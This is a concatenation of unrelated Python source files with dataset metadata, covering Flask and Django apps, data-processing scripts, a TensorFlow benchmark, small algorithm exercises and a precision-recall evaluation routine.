#app.config['UPLOADED_FILES_DEST'] = 'static/files/'\n #configure_uploads(app, files)\n \n app.redis = Redis.from_url(app.config['REDIS_URL'])\n app.task_queue = rq.Queue('pypick-tasks', connection=app.redis)\n \n db.init_app(app)\n #db.create_all() \n \n ###new edits\n migrate.init_app(app, db)\n #manager.init_app(app)\n #manager.add_command('db', MigrateCommand)\n ###end new edits\n \n login.init_app(app)\n mail.init_app(app)\n bootstrap.init_app(app)\n moment.init_app(app)\n\n from app.errors import bp as errors_bp\n app.register_blueprint(errors_bp)\n\n from app.auth import bp as auth_bp\n app.register_blueprint(auth_bp, url_prefix='/auth')\n\n from app.main import bp as main_bp\n app.register_blueprint(main_bp)\n\n if not app.debug:\n \n if app.config['MAIL_SERVER']:\n auth = None\n if app.config['MAIL_USERNAME'] or app.config['MAIL_PASSWORD']:\n auth = (app.config['MAIL_USERNAME'], app.config['MAIL_PASSWORD'])\n secure = None\n if app.config['MAIL_USE_TLS']:\n secure = ()\n mail_handler = SMTPHandler(\n mailhost=(app.config['MAIL_SERVER'], app.config['MAIL_PORT']),\n fromaddr='no-reply@' + app.config['MAIL_SERVER'],\n toaddrs=app.config['ADMINS'], subject='Pypick Failure',\n credentials=auth, secure=secure)\n mail_handler.setLevel(logging.ERROR)\n app.logger.addHandler(mail_handler)\n \n if not os.path.exists('logs'):\n os.mkdir('logs')\n \n file_handler = RotatingFileHandler('logs/pypick.log', maxBytes=10240,\n backupCount=10)\n file_handler.setFormatter(logging.Formatter(\n '%(asctime)s %(levelname)s: %(message)s [in % (pathname)s:%(lineno)d]'))\n file_handler.setLevel(logging.INFO)\n app.logger.addHandler(file_handler)\n \n app.logger.setLevel(logging.INFO)\n app.logger.info('pyGemPick web app starting up!')\n \n return app\n\n#models defines the structure of the database, routes defines the views of the app\n\n\nfrom app import models\n","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"167127764","text":"import random\n\n#get_file_lines: Takes in a file name and returns the lines of the file as a list of strings.\ndef get_file_lines(filename):\n\n file_lines = open(filename, 'r')\n lines_list = file_lines.readlines()\n return lines_list\n\n#lines_printed_backworlds: Takes in a list of strings containing lines of the poem and prints them out backwards with line numbers.\ndef lines_printed_backwards(lines_list):\n\n num_list = range(len(lines_list))\n num_list = list(num_list)\n for num in reversed(num_list):\n print(f\"{num_list[num]} {lines_list[num]}\")\n\n#lines_printed_random: Takes in a list of strings containing lines of the poem and prints them out in random order.\ndef lines_printed_random(lines_list):\n\n num_list = range(len(lines_list))\n num_list = list(num_list)\n for i in num_list:\n num = random.randrange(26)\n print(lines_list[num])\n\n#lines_printed_custom: A function which takes in a list of strings containing lines of the poem and prints them out in some unique way. ( takes one line from top and bottom until reaches the end of poem )\ndef lines_printed_custom(lines_list):\n\n nl = '/n'\n for x in range(int(len(lines_list)/2)):\n print(f\"{x+1} {lines_list[x]}\")\n print(f\"{len(lines_list) - x} {lines_list[len(lines_list) - x - 1]} {nl}\")\n\np_list = get_file_lines(\"poem.txt\")\n\nlines_printed_backwards(p_list)\nlines_printed_random(p_list)\nlines_printed_custom(p_list)\n","sub_path":"poetry-slam.py","file_name":"poetry-slam.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"250095962","text":"# coding: utf-8\n\nimport sys\nimport re\nimport random\nfrom operator import itemgetter\nfrom collections import Counter\nimport urllib\n\n\ndef count_segments(line):\n if len(line) == 0:\n return 0\n if line[len(line) - 1] == '/':\n line = line[0:len(line) - 1]\n return line.count('/', 0, len(line)) - 2\n\n\ndef extract_segments(line):\n # drop / at the end of url\n if len(line) > 0 and line[len(line) - 1] == '/':\n line = line[0:len(line) - 1]\n\n # drop scheme (defined as scheme:[other url])\n schema_end = line.find(':')\n if schema_end != -1:\n line = line[schema_end + 1:len(line)]\n\n # drop // from the beginning if exists\n if line[0:2] == \"//\":\n line = line[2:len(line)]\n\n # drop all stuff before path\n path_begin = line.find('/')\n if path_begin == -1:\n return []\n else:\n line = line[path_begin + 1:len(line)]\n\n # drop all stuff after path\n query_begin = line.find('?')\n if query_begin != -1:\n line = line[0:query_begin]\n fragment_begin = line.find('#')\n if fragment_begin != -1:\n line = line[0:fragment_begin]\n\n # drop / at the end of path part\n if len(line) > 0 and line[len(line) - 1] == '/':\n line = line[0:len(line) - 1]\n\n if len(line) == 0:\n return []\n return re.split('/', line)\n\n\ndef extract_param_names(line):\n names = []\n start_params = line.find('?')\n if start_params == -1:\n return names\n else:\n start_params += 1\n\n end_params = line.find('#')\n if end_params == -1:\n end_params = len(line) - 1\n\n for param_sub in re.split('&', line[start_params:end_params]):\n names.append(re.split('=', param_sub)[0])\n\n return names\n\n\ndef extract_params(line):\n names = []\n start_params = line.find('?')\n if start_params == -1:\n return names\n else:\n start_params += 1\n\n end_params = line.find('#')\n if end_params == -1:\n end_params = len(line) - 1\n\n for param_sub in re.split('&', line[start_params:end_params]):\n names.append(re.split('=', param_sub))\n\n return names\n\ndef get_extension(segment):\n ext_begin = segment.rfind('.')\n if ext_begin == -1:\n return \"\"\n return segment[ext_begin + 1: len(segment)]\n\n# reads files with INPUT FILES and writes features with frequency into OUTPUT FILE\ndef extract_features(INPUT_FILE_1, INPUT_FILE_2, OUTPUT_FILE):\n examined = open(INPUT_FILE_1, \"r\")\n general = open(INPUT_FILE_2, \"r\")\n result = open(OUTPUT_FILE, \"w\")\n\n sample_size = 1000\n min_count = 100\n\n examined_lines = random.sample(examined.read().split('\\n'), sample_size)\n general_lines = random.sample(general.read().split('\\n'), sample_size)\n\n features = extract_features_from_list(examined_lines, general_lines)\n\n for key, value in features:\n if value < min_count:\n break\n result.write(key + '\\t' + str(value) + '\\n')\n\n\n# returns sorted Counter dictionary with features\ndef extract_features_from_list(QLINK_LIST, UNKNOWN_URLS_LIST):\n lines = []\n features = Counter()\n\n examined_lines = QLINK_LIST\n general_lines = UNKNOWN_URLS_LIST\n lines.extend(examined_lines)\n lines.extend(general_lines)\n\n for line in lines:\n if line.find('\\n') != -1:\n line = line[0:len(line) - 1]\n features_from_url = extract_features_from_url(line)\n if (features_from_url):\n\t for feature in features_from_url:\n\t features[feature] += 1\n else:\n \tprint (line)\n features = features.most_common()\n\n print(features)\n return features\n\n\n# extracts features from one url\ndef extract_features_from_url(url):\n features = []\n\n # feature 1\n features.append(\"segments:\" + str(count_segments(url)))\n # feature 2\n for name in extract_param_names(url):\n features.append(\"param_name:\" + name)\n # feature 3\n for param in extract_params(url):\n if len(param) == 1:\n param.append(\"\")\n features.append(\"param:\" + param[0] + \"=\" + param[1])\n # features 4a - 4f\n #print(features)\n segments = extract_segments(url)\n #if not segments:\n #\treturn features\n for pos, segment in enumerate(segments):\n segment_decoded = urllib.parse.unquote(segment)\n regex_res = re.findall(\"[^\\\\d]+\\\\d+[^\\\\d]+$\", segment_decoded)\n # feature 4a\n features.append(\"segment_name_\" + str(pos) + \":\" + segment)\n # feature 4b\n if segment.isdigit():\n features.append(\"segment_[0-9]_\" + str(pos) + \":1\")\n # feature 4c\n if len(regex_res) == 1 and regex_res[0] == segment_decoded:\n features.append(\"segment_substr[0-9]_\" + str(pos) + \":1\")\n # feature 4d\n extension = get_extension(segment)\n if len(extension) != 0:\n features.append(\"segment_ext_\" + str(pos) + \":\" + extension)\n # feature 4e\n if len(regex_res) == 1 and regex_res[0] == segment_decoded and len(extension) != 0:\n features.append(\"segment_ext_substr[0-9]_\" + str(pos) + \":\" + extension)\n # feature 4f\n features.append(\"segment_len_\" + str(pos) + \":\" + str(len(segment)))\n return features\n","sub_path":"2_Semester/InfoSearch/Sekitei/HA_1/ef.py","file_name":"ef.py","file_ext":"py","file_size_in_byte":5184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"437714733","text":"import tensorflow as tf\n\nFLAGS = tf.app.flags.FLAGS\n\ndef fake_data(batch_size, num_classes):\n batch_size = int(batch_size / FLAGS.num_workers)\n data = tf.Variable(\n tf.random_normal(\n [batch_size, FLAGS.weight_size],\n dtype=tf.float32,\n stddev=1e-1), name='data', trainable=False)\n labels = tf.Variable(\n tf.zeros([batch_size, num_classes]), trainable=False)\n return data, labels\n\n\ndef initialize_weights():\n weights = []\n for i in range(FLAGS.level):\n weights.append(\n tf.Variable(\n tf.zeros([FLAGS.weight_size, FLAGS.weight_size])))\n weights.append(\n tf.Variable(\n tf.zeros([FLAGS.weight_size, 1])))\n return weights\n\n\ndef network(inputs, weights, labels):\n targets = []\n g = tf.get_default_graph()\n\n bp_sources = [[] for i in range(FLAGS.num_workers + 1)]\n losses = []\n logits = []\n\n # FF\n for j in range(FLAGS.num_workers):\n with tf.device('/gpu:%d' % j):\n x = inputs[j]\n for i in range(FLAGS.level):\n bp_sources[j].append(x)\n x = tf.matmul(x, weights[j][i])\n bp_sources[j].append(x)\n logit = tf.matmul(x, weights[j][-1])\n loss = (logit - labels[j]) * (logit - labels[j])\n losses.append(loss)\n logits.append(logit)\n\n # return losses\n # BP\n dxs = []\n temp_dxs = []\n for j in range(FLAGS.num_workers):\n with tf.device('/gpu:%d' % j):\n dx = 2 * (logits[j] - labels[j])\n dxs.append(dx)\n\n for i in reversed(range(FLAGS.level + 1)):\n dws = []\n for j in range(FLAGS.num_workers):\n with tf.device('/gpu:%d' % j):\n dw = tf.matmul(tf.transpose(bp_sources[j][i]), dxs[j])\n if i == FLAGS.level:\n dws.append(dw)\n else:\n dws.append(tf.split(1, FLAGS.num_workers, dw))\n dx = tf.matmul(dxs[j], tf.transpose(weights[j][i]))\n temp_dxs.append(dx)\n \n dxs = temp_dxs\n temp_dxs = []\n\n # Update weights\n # Reduce\n if i == FLAGS.level:\n for j in range(FLAGS.num_workers):\n with tf.device('/gpu:%d' % j):\n dw = sum(dws) / FLAGS.num_workers\n targets.append(tf.assign(weights[j][i], weights[j][i] - dw))\n else:\n partial_dws = []\n for j in range(FLAGS.num_workers):\n with tf.device('/gpu:%d' % j):\n partial_dw = dws[0][j]\n for dw in dws[1:]:\n partial_dw += dw[j]\n partial_dw /= FLAGS.num_workers\n partial_dws.append(partial_dw)\n\n # Aggregrate\n for j in range(FLAGS.num_workers):\n with tf.device('/gpu:%d' % j):\n dw = tf.concat(1, partial_dws)\n targets.append(tf.assign(weights[j][i], weights[j][i] - dw))\n\n # return targets\n with g.control_dependencies(targets):\n final = tf.no_op()\n return final \n\n\ndef get_run_op():\n assert FLAGS.num_workers == 2\n datum = []\n labels = []\n weights = []\n for i in range(FLAGS.num_workers):\n with tf.device('/gpu:%d' % i):\n data, label = fake_data(FLAGS.batch_size, 1)\n datum.append(data)\n labels.append(label)\n weights.append(initialize_weights())\n gradient_targets = network(datum, weights, labels)\n return gradient_targets\n","sub_path":"benchmark/mini/models/fc_data_manual.py","file_name":"fc_data_manual.py","file_ext":"py","file_size_in_byte":3644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"2441358","text":"\"\"\"\n[완전탐색_재귀]\nSW 모의문제\n\"\"\"\n\ndef f(s, idx, plus, minus, mul, div):\n global minV, maxV\n if idx >= N:\n minV = s if s < minV else minV\n maxV = s if s > maxV else maxV\n else:\n if plus: f(s+M[idx], idx+1, plus-1, minus, mul, div)\n if minus: f(s-M[idx], idx+1, plus, minus-1, mul, div)\n if mul: f(s*M[idx], idx+1, plus, minus, mul-1, div)\n if div: f(int(s/M[idx]), idx+1, plus, minus, mul, div-1)\n\nN = int(input())\nM = list(map(int, input().split()))\nC = list(map(int, input().split()))\nminV = 987654321\nmaxV = -987654321\n\nf(M[0], 1, C[0], C[1], C[2], C[3])\n\nprint(maxV)\nprint(minV)","sub_path":"TaeJuneJoung/ACM/brute_force/p14888.연산자 끼워넣기.py","file_name":"p14888.연산자 끼워넣기.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"36237374","text":"import glob\nimport gzip\nimport numpy as np\nimport os\nimport pandas as pd\nfrom os.path import join, isdir\n\n# use the meta name to put things in a certain folder\nbase = \"/azure-ml/mvinterns/deepmind-headneck-0/ct/\"\n\nimage_dataname = \"image*\"\n\nraw_data_folder = \"raw_dataset\"\n\n# get all files with pattern\nimage_files = glob.glob(join(base, image_dataname))\n\n# for each file\nimg_data = pd.DataFrame(\n columns=['img', 'Bone_Mandible', 'SpinalCanal', 'Glnd_Lacrimal_L', 'Lung_R', 'Glnd_Submand_R', 'Glnd_Lacrimal_R',\n 'Cochlea_L', 'OpticNrv_cnv_R', 'Lens_R', 'SpinalCord', 'Parotid_R', 'Glnd_Submand_L', 'Brainstem',\n 'OpticNrv_cnv_L', 'Cochlea_R', 'Eye_R', 'Lens_L', 'Lung_L', 'Brain', 'Eye_L', 'Parotid_L'])\ncount = 0\nfor image_file in image_files:\n\n try:\n pid_scanid = image_file.split('/')[-1][6:-4]\n\n print(pid_scanid)\n pid = pid_scanid.split('.')[0]\n scanid = pid_scanid.split('-')[-1].split('_')[0]\n\n meta_dataname = join(base, \"meta_\" + pid_scanid + \".pkz\")\n image = np.load(image_file, allow_pickle=True)[\"arr_0\"]\n meta_data = np.load(gzip.open(meta_dataname, 'rb'), allow_pickle=True)\n\n masksname = join(base, \"masks_\" + pid_scanid + \"/\")\n masks = []\n\n for filename in os.listdir(masksname):\n f = join(masksname, filename)\n\n # checking if it is a file\n mask = np.load(gzip.open(f, 'rb'), allow_pickle=True)\n masks.append(mask)\n except Exception as e:\n print(e)\n continue\n\n if not masks:\n continue\n\n shape = meta_data['shape'] # scan shape\n spacing = (meta_data['ND_SliceSpacing'], meta_data['PixelSpacing'][1], meta_data['PixelSpacing'][0])\n\n for mask_data in masks:\n print('Saving ' + mask_data['name'])\n shape = mask_data['shape'] # shape of scan\n bbox = mask_data['bbox']\n cropped_mask = mask_data['roi']\n body_part_name = mask_data['name']\n \n x = image.shape[0]\n body_part_folder = join(raw_data_folder, body_part_name)\n if cropped_mask is None:\n print('roi is none')\n for i in range(x):\n img_name = join(body_part_folder, 'img', pid, scanid, pid_scanid + \"_\" + str(i) + \".png\")\n img_data.loc[count, 'img'] = img_name\n img_data.loc[count, body_part_name] = -1\n count += 1\n continue\n\n mask = np.zeros(shape, dtype=np.bool)\n try:\n b = [bbox[i] for i in [0, 3, 1, 4, 2, 5]] # get it in (z_min, z_max, y_min, y_max, x_min, x_max)\n mask[b[0]: b[1], b[2]: b[3], b[4]: b[5]] = cropped_mask\n z_min = bbox[0]\n z_max = bbox[3]\n\n mask_rgb = (mask[:, :, :] * 255).astype(np.uint8)\n pid_scanid_folder = join(body_part_folder, \"img\", pid, scanid)\n if not isdir(pid_scanid_folder):\n os.makedirs(join(body_part_folder, \"img\", pid, scanid))\n os.makedirs(join(body_part_folder, \"labelcol\", pid, scanid))\n\n # img_data.\n\n for i in range(x):\n img_name = join(body_part_folder, 'img', pid, scanid, pid_scanid + \"_\" + str(i) + \".png\")\n img_data.loc[count, 'img'] = img_name\n if i < z_min or i > z_max:\n img_data.loc[count, body_part_name] = -1\n else:\n img_data.loc[count, body_part_name] = 1\n count += 1\n except Exception as e:\n print(e)\n continue\n\n print()\n\nimg_data = img_data.fillna(0)\nimg_data.to_csv('img_data.csv')\n","sub_path":"load_data_for_classification.py","file_name":"load_data_for_classification.py","file_ext":"py","file_size_in_byte":3634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"176678609","text":"import unittest\nimport queue\n\nclass QueueTwoStacks(object):\n\n # Implement the enqueue and dequeue methods\n s1 = queue.LifoQueue()\n s2 = queue.LifoQueue()\n\n def enqueue(self, item):\n self.s1.put(item)\n\n def dequeue(self):\n if(self.s1.qsize()==0):\n raise Exception(\"queue empty\")\n else:\n while(self.s1.qsize()>1):\n self.s2.put(self.s1.get())\n temp = self.s1.get()\n while(self.s2.qsize()>0):\n self.s1.put(self.s2.get())\n return temp\n\n# Tests\n\nclass Test(unittest.TestCase):\n\n def test_queue_usage(self):\n queue = QueueTwoStacks()\n\n queue.enqueue(1)\n queue.enqueue(2)\n queue.enqueue(3)\n\n actual = queue.dequeue()\n expected = 1\n self.assertEqual(actual, expected)\n\n actual = queue.dequeue()\n expected = 2\n self.assertEqual(actual, expected)\n\n queue.enqueue(4)\n\n actual = queue.dequeue()\n expected = 3\n self.assertEqual(actual, expected)\n\n actual = queue.dequeue()\n expected = 4\n self.assertEqual(actual, expected)\n\n with self.assertRaises(Exception):\n queue.dequeue()\n\n","sub_path":"Week-1/Day-6/queueTwoStacks.py","file_name":"queueTwoStacks.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"409519696","text":"from django.contrib import admin\nfrom plugin.admin import my_admin_site\n\nfrom .models import (\n Equipment, \n EquipmentType,\n EquipmentInspection,\n SprayPumpRoomInspection,\n SprayWarehouseInspection,\n )\n\nfrom .forms import (\n EquipmentInspectionForm,\n)\n\n# Register your models here.\nclass EquipmentTypeAdmin(admin.ModelAdmin):\n list_display = [\"name\"]\n list_editable = [\"name\"]\n list_filter = [ \"name\"]\n\n view_on_site = False\n\n class Meta:\n model = EquipmentType\n\nclass EquipmentAdmin(admin.ModelAdmin):\n list_display = [\"name\",\"type\"]\n list_editable = [ \"type\"]\n list_filter = [ \"type\"]\n\n view_on_site = False\n\n class Meta:\n model = Equipment\n\nclass EquipmentInspectionAdmin(admin.ModelAdmin):\n list_display = [\"equipment\",\"use_condition\",\"inspector\",\"check_date\",\"updated\",\"owner\",\"due_date\",\"completed_time\"]\n list_editable = [\"use_condition\",\"owner\",\"due_date\"]\n list_filter = [\"equipment\",\"use_condition\",\"inspector\",\"check_date\"]\n form = EquipmentInspectionForm\n\n view_on_site = False\n\n class Meta:\n model = EquipmentInspection\n\n class Media:\n css = {\n \"all\": (\"css/model_admin.css\",\"css/equipment.css\")\n }\n js = (\"js/jquery.min.js\",\"js/model_admin.js\",)\n\n\nclass SprayPumpRoomInspectionAdmin(admin.ModelAdmin):\n list_display = ['year','month',\n \"voltage_and_power_normal\",\n \"indicator_and_instrument_normal\",\n \"switch_contactor_and_connection_normal\",\n \"no_corrosion_inside_and_foundation_bolt_not_loose\",\n \"motor_and_pump_connection_intact\",\n \"motor_sample_integrated\",\n \"no_corrosion_and_damage\",\n \"valve_normally_open\",\n \"one_way_valve_intact_and_no_leak_and_pressure_gage_normal\",\n \"pressure_maintaining_valve_intact\",\n \"water_level_normal_and_moisturizing_well\",\n \"water_level_cover_plate_and_no_abnormal_move\",\n \"pool_wall_dry_and_no_leak\",\n \"no_sundries_in_pump_house\",\n \"pump_house_clean_and_tidy\",\n ]\n list_editable = [\"voltage_and_power_normal\",\n \"indicator_and_instrument_normal\",\n \"switch_contactor_and_connection_normal\",\n \"no_corrosion_inside_and_foundation_bolt_not_loose\",\n \"motor_and_pump_connection_intact\",\n \"motor_sample_integrated\",\n \"no_corrosion_and_damage\",\n \"valve_normally_open\",\n \"one_way_valve_intact_and_no_leak_and_pressure_gage_normal\",\n \"pressure_maintaining_valve_intact\",\n \"water_level_normal_and_moisturizing_well\",\n \"water_level_cover_plate_and_no_abnormal_move\",\n \"pool_wall_dry_and_no_leak\",\n \"no_sundries_in_pump_house\",\n \"pump_house_clean_and_tidy\",]\n \n list_filter = ['year','month',]\n\n view_on_site = False\n\n class Meta:\n model = SprayPumpRoomInspection\n\n class Media:\n css = {\n \"all\": (\"css/model_admin.css\",\"css/equipment.css\")\n }\n js = (\"js/jquery.min.js\",\"js/model_admin.js\",)\n\nclass SprayWarehouseInspectionAdmin(admin.ModelAdmin):\n list_display = ['year','month',\n \"valve_normal\",\n \"valve_open_signal_transmission_normal\",\n \"valve_no_corrosion\",\n \"water_testing_normal\",\n \"valve_switch_in_close_status\",\n \"pipe_network_pressure_normal\",\n \"pipe_valve_in_open_status\",\n \"pipe_connection_no_leakage\",\n \"spray_head_no_leakage\",\n \"inspector\",\n \"check_date\",\n ]\n list_editable = [\n \"valve_normal\",\n \"valve_open_signal_transmission_normal\",\n \"valve_no_corrosion\",\n \"water_testing_normal\",\n \"valve_switch_in_close_status\",\n \"pipe_network_pressure_normal\",\n \"pipe_valve_in_open_status\",\n \"pipe_connection_no_leakage\",\n \"spray_head_no_leakage\",\n ]\n \n list_filter = ['year','month',]\n\n view_on_site = False\n\n class Meta:\n model = SprayWarehouseInspection\n\n class Media:\n css = {\n \"all\": (\"css/model_admin.css\",\"css/equipment.css\")\n }\n js = (\"js/jquery.min.js\",\"js/model_admin.js\",)\n\nadmin.site.register(Equipment, EquipmentAdmin)\nadmin.site.register(EquipmentType, EquipmentTypeAdmin)\nadmin.site.register(EquipmentInspection, EquipmentInspectionAdmin)\nadmin.site.register(SprayPumpRoomInspection, SprayPumpRoomInspectionAdmin)\nadmin.site.register(SprayWarehouseInspection, SprayWarehouseInspectionAdmin)\n\nmy_admin_site.register(Equipment, EquipmentAdmin)\nmy_admin_site.register(EquipmentType, EquipmentTypeAdmin)\nmy_admin_site.register(EquipmentInspection, EquipmentInspectionAdmin) \nmy_admin_site.register(SprayPumpRoomInspection, SprayPumpRoomInspectionAdmin) \nmy_admin_site.register(SprayWarehouseInspection, SprayWarehouseInspectionAdmin)","sub_path":"equipments/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":4807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"293745032","text":"from flask import Flask, redirect, render_template, request, url_for\nfrom server import app, user_input\nimport csv\nfrom csv_fun import *\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef index():\n if request.method == \"POST\":\n name = request.form[\"name\"]\n zID = int(request.form[\"zID\"])\n description = request.form[\"desc\"]\n user_input.append([name, zID, description])\n #with open('example','a') as csv_out:\n #writer = csv.writer(csv_out)\n #writer.writerow([name, zID, description])\n write_to_csv(\"example.csv\",[name, zID, description])\n \n return redirect(url_for(\"hello\"))\n return render_template(\"index.html\")\n\n@app.route(\"/Hello\")\ndef hello():\n user_list = print_from_csv(\"example.csv\")\n \n return render_template(\"hello.html\", all_users=user_list) \n","sub_path":"lab04/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"394505558","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 14 19:02:55 2017\n\n@author: absol\n\"\"\"\n\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\ndata = pd.read_csv('Salary_Data.csv')\n\nX = data.iloc[:, 0].values\nY = data.iloc[:, 1].values\nX = X.reshape((30,1))\nY = Y.reshape((30,1))\n\nfrom sklearn.cross_validation import train_test_split\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size = 1/3, random_state = 0)\n\n#No feature scaling required because library(linear_model) takes care of it\n#Simple Linear Regression\nfrom sklearn.linear_model import LinearRegression\nregressor = LinearRegression()\nregressor = regressor.fit(X_train, Y_train)\n\n#Predicting using the trained model\ny_pred = regressor.predict(X_test)\n\n#Plotting the actual vs. predicted data\nplt.scatter(X_test, Y_test, color = 'blue')\nplt.scatter(X_test, y_pred, color = 'red')\nplt.title('actual(blue) vs. predicted(red) data')\nplt.xlabel('Years of experience')\nplt.ylabel('Salary')\n\n# Plotting the regression line on the training dataset\nplt.scatter(X_train, Y_train, color = 'blue')\nplt.plot(X_train, regressor.predict(X_train), color = 'red')\nplt.title('Regression line')\n\n#Plotting the actual values which should have been plotted against the regression line\nplt.scatter(X_test, Y_test, color = 'blue')\nplt.plot(X_train, regressor.predict(X_train), color = 'red')\nplt.title('Actual values against regression line')\n\n#Overall a good model","sub_path":"Machine-Learning-with-Python-R/Simple Linear Regression/linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"315152177","text":"import redis\nimport numpy as np\n\nhost = '127.0.0.1'\nport = 6379\npassword = None\n\n\nclass MyRedis:\n def __init__(self, scope):\n self.my_redis = redis.StrictRedis(host=host, port=port, db=0, password=password)\n self.scope = scope\n self.store_batch = 100000\n\n def store_td(self, saved_obj):\n my_dicts = saved_obj['q']\n step = saved_obj['step']\n\n self.my_redis.set(self.scope + ':step', step)\n\n i = 0\n tmp = dict()\n for item in my_dicts.items():\n tmp[item[0]] = '_'.join(['{:0.3f}'.format(value) for value in item[1]])\n i = i + 1\n if i % self.store_batch == 0:\n self.my_redis.hmset(self.scope + ':q', tmp)\n tmp = dict()\n if len(tmp) > 0:\n self.my_redis.hmset(self.scope + ':q', tmp)\n\n def restore_td(self):\n has_step = self.my_redis.exists(self.scope + ':step')\n has_q_dicts = self.my_redis.exists(self.scope + ':q')\n if not has_step or not has_q_dicts:\n return None\n\n restore_dicts = dict()\n restore_dicts['step'] = int(self.my_redis.get(self.scope + ':step').decode('utf-8'))\n q_dicts = self.my_redis.hgetall(self.scope + ':q')\n\n temp_dicts = dict()\n for pair in q_dicts.items():\n temp_dicts[pair[0].decode('utf-8')] = np.array([float(item) for item in pair[1].decode('utf-8').split('_')])\n restore_dicts['q'] = temp_dicts\n\n return restore_dicts\n\n def hlen_q(self):\n name = self.scope + ':q'\n value = self.my_redis.hlen(name)\n\n return value\n\n def hget_q(self, key):\n name = self.scope + ':q'\n value = self.my_redis.hget(name, key)\n\n if value is None:\n return np.zeros(4)\n return np.array([float(item) for item in value.decode('utf-8').split('_')])\n\n def hset_q(self, key, value):\n name = self.scope + ':q'\n self.my_redis.hset(name, key, '_'.join(['{:0.3f}'.format(value) for value in value]))\n\n def get_step(self):\n value = self.my_redis.get(self.scope + ':step').decode('utf-8')\n\n if value is None:\n return -1\n\n return int(value)\n\n def set_step(self, value):\n self.my_redis.set(self.scope + ':step', value)\n","sub_path":"my_redis/my_redis.py","file_name":"my_redis.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"194184155","text":"\nimport argparse\nimport ctypes\nimport glob\nimport os\nimport re\nimport sys\nfrom multiprocessing import Array\nfrom multiprocessing import Process\nfrom multiprocessing import Queue\nfrom os.path import basename\nfrom os.path import exists\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport six\n\nimport cv2 as cv\nfrom utils.evaluation import relax_precision\nfrom utils.evaluation import relax_recall\n\nif 'linux' in sys.platform:\n import matplotlib\n matplotlib.use('Agg')\n\ndef get_pre_rec(positive, prec_tp, true, recall_tp, steps):\n pre_rec = []\n breakeven = []\n for t in six.moves.range(steps):\n if positive[t] < prec_tp[t] or true[t] < recall_tp[t]:\n sys.exit('calculation is wrong')\n pre = float(prec_tp[t]) / positive[t] if positive[t] > 0 else 0\n rec = float(recall_tp[t]) / true[t] if true[t] > 0 else 0\n pre_rec.append([pre, rec])\n if pre != 1 and rec != 1 and pre > 0 and rec > 0:\n breakeven.append([pre, rec])\n pre_rec = np.asarray(pre_rec)\n breakeven = np.asarray(breakeven)\n breakeven_pt = np.abs(breakeven[:, 0] - breakeven[:, 1]).argmin()\n breakeven_pt = breakeven[breakeven_pt]\n\n return pre_rec, breakeven_pt\n\n\ndef draw_pre_rec_curve(pre_rec, breakeven_pt):\n plt.clf()\n plt.plot(pre_rec[:, 0], pre_rec[:, 1])\n plt.plot(breakeven_pt[0], breakeven_pt[1],\n 'x', label='breakeven recall: {}'.format(breakeven_pt[1]))\n plt.ylabel('recall')\n plt.xlabel('precision')\n plt.ylim([0.0, 1.1])\n plt.xlim([0.0, 1.1])\n plt.legend(loc='lower left')\n plt.grid(linestyle='--')\n\n\ndef worker_thread(result_fn_queue, eval_dir, label_dir, pad, offset, channel, steps, relax, all_positive, all_prec_tp, all_true, all_recall_tp):\n while True:\n i, result_fn = result_fn_queue.get()\n if result_fn is None:\n break\n\n img_id = basename(result_fn).split('pred_')[-1]\n img_id, _ = os.path.splitext(img_id)\n if '.' in img_id:\n img_id = img_id.split('.')[0]\n if len(re.findall('_', img_id)) > 1:\n img_id = '_'.join(img_id.split('_')[1:])\n out_dir = '{}{}'.format(eval_dir, img_id)\n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n print(img_id)\n\n label = cv.imread('{}{}.tif'.format(label_dir, img_id), cv.IMREAD_GRAYSCALE)\n pred = np.load(result_fn)\n label = label[pad + offset - 1:\n pad + offset - 1 + pred.shape[0],\n pad + offset - 1:\n pad + offset - 1 + pred.shape[1]]\n cv.imwrite('{}/label_{}.png'.format(out_dir, img_id), label * 125)\n\n print('pred_shape: {}'.format(pred.shape))\n\n for c in six.moves.range(channel):\n for t in six.moves.range(0, steps):\n threshold = 1.0 / steps * t\n\n pred_vals = np.array(\n pred[:, :, c] >= threshold, dtype=np.int32)\n\n label_vals = np.array(label, dtype=np.int32)\n if channel > 1:\n label_vals = np.array(label == c, dtype=np.int32)\n\n all_positive[i, c, t] = np.sum(pred_vals)\n all_prec_tp[i, c, t] = relax_precision(\n pred_vals, label_vals, relax)\n\n all_true[i, c, t] = np.sum(label_vals)\n all_recall_tp[i, c, t] = relax_recall(\n pred_vals, label_vals, relax)\n\n pre_rec, breakeven_pt = get_pre_rec(\n all_positive[i, c], all_prec_tp[i, c],\n all_true[i, c], all_recall_tp[i, c], steps)\n\n draw_pre_rec_curve(pre_rec, breakeven_pt)\n plt.savefig('{}/pr_curve_{}.png'.format(out_dir, c))\n 